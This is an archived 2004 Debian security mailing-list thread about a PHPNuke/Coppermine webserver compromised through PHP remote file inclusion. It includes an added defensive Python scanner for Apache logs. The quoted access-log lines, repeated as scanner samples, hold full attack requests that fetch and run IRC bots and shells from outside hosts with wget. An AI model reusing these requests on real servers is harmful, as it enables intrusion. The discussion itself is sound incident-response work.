RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-23 Thread Ross Tsolakidis
Thanks for all your help.
The dodgy code has been removed and the server secured !

Thanks again !

--
Ross


-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Saturday, 19 June 2004 11:24 AM
To: Ross Tsolakidis
Cc: [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
 Hi all,
 
 I did a search in the logs on some of the suspicious users and found a
 match.
 The files that are being downloaded then executed seem to be IRC bots.
 http://www.energymech.net/
 
 Here are some log files.
 
 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
 /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
 la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
 vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
 6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

 
 All those executables in the /tmp dir seem to be all coming from that
 site on our box, definitely the culprit.
 
 Can someone explain what is going on here ?
 Cause it doesn't make any sense.

  There seems to be some buggy PHP code being used on that site, which 
 is allowing the remote inclusion of  content from the mirabella.net 
 site - this is being abused to run code upon your host.

  You should immediately disable the coppermine PHPNuke module and
 get it patched, upgraded, or replaced.

  Going to securityfocus.com and searching the mailing lists for
 coppermine pulls up multiple hits describing problems - for example
 this post:

http://www.securityfocus.com/archive/1/361976

  Notice the URLs on section E2?  They match yours..

  See this one for more details too:

http://www.securityfocus.com/archive/1/361976

  Two things you can do immediately to stop this particular exploit
 are run safe mode for PHP, and firewall off access to mirabella.net.

 What steps should I take now ?

  Remove PHP Nuke, check the logs for other activity, make sure your
 kernel is patched against local root via the recent holes, and
 look at using a locked down PHP installation - I'm not sure how
 PHPNuke will work with that, but it's gotta be worth a try.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.



RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-18 Thread Ross Tsolakidis
Hi all,

I did a search in the logs on some of the suspicious users and found a
match.
The files that are being downloaded then executed seem to be IRC bots.
http://www.energymech.net/

Here are some log files.

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;ps%20x HTTP/1.0 200 8847 - Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)

200.177.162.14 - - [21/May/2004:19:10:06 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooks
equipment.com/newcmd.gif?cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell
HTTP/1.1 200 11813 - Mozilla/4.0 (compatible; MSIE 5.5; Windows 98;
Win 9x 4.90)

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200
6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)


All those executables in the /tmp dir seem to be all coming from that
site on our box, definitely the culprit.

Can someone explain what is going on here ?
Cause it doesn't make any sense.

The site in question is a phpnuke site with lots of modules.

What steps should I take now ?

Thanks very much for everyone's help.



--
Ross

-Original Message-
From: Ross Tsolakidis 
Sent: Friday, 18 June 2004 9:20 AM
To: [EMAIL PROTECTED]
Subject: RE: Advice needed, trying to find the vulnerable code on Debian
webserver.

Thanks to everyone who has responded.
I will be investigating all these options in the next few days, I'll
keep you all informed. 


--
Ross

-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: [EMAIL PROTECTED]
Cc: Alvin Oga; [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
   
   Install some rules for it to harden your webserver, see if 
   anything is flagged in the security log.
  
  other web server testing tools
  http://www.linux-sec.net/Web/#Testing
 
 Has anyone actually used any of these to find the vulnerabilities that
 are being discussed?

  Not personally, I've used snort and some other custom logging code  to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or do the
 access logs show anything suspicious?  It's clear that Apache is the
 route into the system if you have files owned by www-data - maybe
 mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

  
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]




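A defender's check for the pattern in these access logs, added here as an example and not part of the thread: the scanner below parses Apache log lines, URL-decodes the query string, and flags any parameter whose value is itself a remote URL (the THEME_DIR include Steve describes) together with the shell string carried in that URL's nested cmd= parameter. The sample input reuses two lines from Ross's post plus one constructed benign request; the regexes and function names are my own assumptions.

```python
"""Flag PHP remote-file-inclusion (RFI) attempts in Apache access logs.

The theme.php requests quoted in this thread carry a full URL in the
THEME_DIR parameter, so the script includes its "theme" from a remote
host; the commands to run travel in a nested cmd= parameter on that URL.
This scanner decodes each request's query string and reports parameters
whose value is itself a URL, plus any shell string in that URL's query.
Added example for this thread, not code from the original posts.
"""
import re
from urllib.parse import unquote, urlsplit

# Common/combined log line; the request may or may not be double-quoted
# (the lines quoted in the thread lost their quotes in transit).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"?(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"? '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)  # the RFI signature
# Command separators and downloaders typical of an injected shell string
SHELL_RE = re.compile(r'(;|\|\||&&|`|\bwget\b|\bcurl\b|\bchmod\b|\./)')


def parse_query(query):
    """Decode a raw query string into (name, value) pairs.

    Done by hand instead of parse_qsl so that ';' inside a value (the
    injected command separator) is never treated as a pair delimiter.
    """
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote(name), unquote(value)))
    return pairs

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def inspect_target(target):
    """Return RFI findings for one request target (path?query).

    A finding names the parameter carrying the remote URL, that URL's
    host, and the shell command in the URL's own query (None if absent).
    """
    findings = []
    parsed = urlsplit(target)
    for name, value in parse_query(parsed.query):
        if not REMOTE_URL_RE.match(value):
            continue
        nested = urlsplit(value)
        cmd = next((v for _, v in parse_query(nested.query)
                    if SHELL_RE.search(v)), None)
        findings.append({'path': parsed.path, 'param': name,
                         'include_host': nested.hostname, 'cmd': cmd})
    return findings

def scan_lines(lines):
    """Scan log lines; one finding per RFI attempt, tagged with source IP and time."""
    results = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        for f in inspect_target(fields['target']):
            f.update(ip=fields['ip'], time=fields['time'])
            results.append(f)
    return results

# Sample input: two lines quoted in the thread plus one constructed benign
# request (a local THEME_DIR value) that must not be flagged.
SAMPLE_LOG = [
    '193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xzvf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0 200 6461 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
    '193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?cmd=cd%20/tmp/;ps%20x HTTP/1.0 200 8847 - Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
    '10.0.0.5 - - [18/Jun/2004:23:01:12 +1000] GET /modules/coppermine/themes/default/theme.php?THEME_DIR=themes/default HTTP/1.1 200 5120 - Mozilla/4.0 (compatible)',
]

if __name__ == '__main__':
    for hit in scan_lines(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['param']} <- {hit['include_host']} cmd={hit['cmd']!r}")
```

Run against the full access log, the output gives the source addresses, the hosts serving the included code and the decoded commands, which is the list to feed into firewall rules and the clean-up of /tmp.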




RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-17 Thread Ross Tsolakidis
Thanks to everyone who has responded.
I will be investigating all these options in the next few days, I'll
keep you all informed. 


--
Ross

-Original Message-
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: [EMAIL PROTECTED]
Cc: Alvin Oga; [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
   
   Install some rules for it to harden your webserver, see if 
   anything is flagged in the security log.
  
  other web server testing tools
  http://www.linux-sec.net/Web/#Testing
 
 Has anyone actually used any of these to find the vulnerabilities that
 are being discussed?

  Not personally, I've used snort and some other custom logging code  to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or do the
 access logs show anything suspicious?  It's clear that Apache is the
 route into the system if you have files owned by www-data - maybe
 mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

  
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.




RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread Ross Tsolakidis
Wipe, install, set up chkrootkit and run it often. 
I've already done that.  There was no rootkit.

How does phpnuke compromise apache if apache is set up correctly?
I believe it's some of the modules available and running php with 'safe
mode off'.

I need to find the vulnerable code on this box.  And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.


--
Ross



-Original Message-
From: s. keeling [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, 15 June 2004 2:06 PM
To: [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

Incoming from Ross Tsolakidis:
 
 One of our webservers seems to get compromised on a daily basis.
 When I do a ps ax I see these processes all the time.
 
 18687 ?        S      0:00 shell
 18701 ?        Z      0:00 [sh defunct]
 18704 ?        T      0:00 ./3 200.177.162.185 1524

I vaguely remember that 3 in /tmp is slapper.  Wipe, install, set up
chkrootkit and run it often.

How does phpnuke compromise apache if apache is set up correctly?


--
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -






Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-14 Thread Ross Tsolakidis
Hi all,

One of our webservers seems to get compromised on a daily basis.
When I do a ps ax I see these processes all the time.

18687 ?        S      0:00 shell
18701 ?        Z      0:00 [sh defunct]
18704 ?        T      0:00 ./3 200.177.162.185 1524
18705 ?        Z      0:00 [3 defunct]

And if I check the /tmp dir there are strange executable files in there
that are owned by www-data.
Such as ./3 and others like ./bdshell.
Definitely some sort of Trojan that's being run by www-data user.

When I did a virus check first time it showed that it was infected with
the old Linux.RST virus, it basically stuffed the entire /bin directory.

I did a rebuild, virus checked all client files on a different server,
then copied them back.

After a week, same thing.
Infected.

/tmp/sl# ls -al
total 452
drwxr-xr-x    2 www-data www-data     4096 Jun  1 09:32 .
drwxrwxrwt    3 root     root         4096 Jun  1 09:37 ..
-rwsrwsrwt    1 www-data www-data   446714 May 29 05:12 ps.htm

I'm pretty sure it's one of our clients who has some dodgy php-nuke
sites or something like that.

All our other webservers are fine running the same build.
But this server is the major client one where we allow them to FTP, CGI
and make MYSQL changes.

I'd appreciate some help on how to stop this from happening.

Running Debian Stable with all the security updates.

P.S. Sorry for the Disclaimer, company policy, which I don't agree with,
yet they pay me so I must comply  :/

--
Ross.



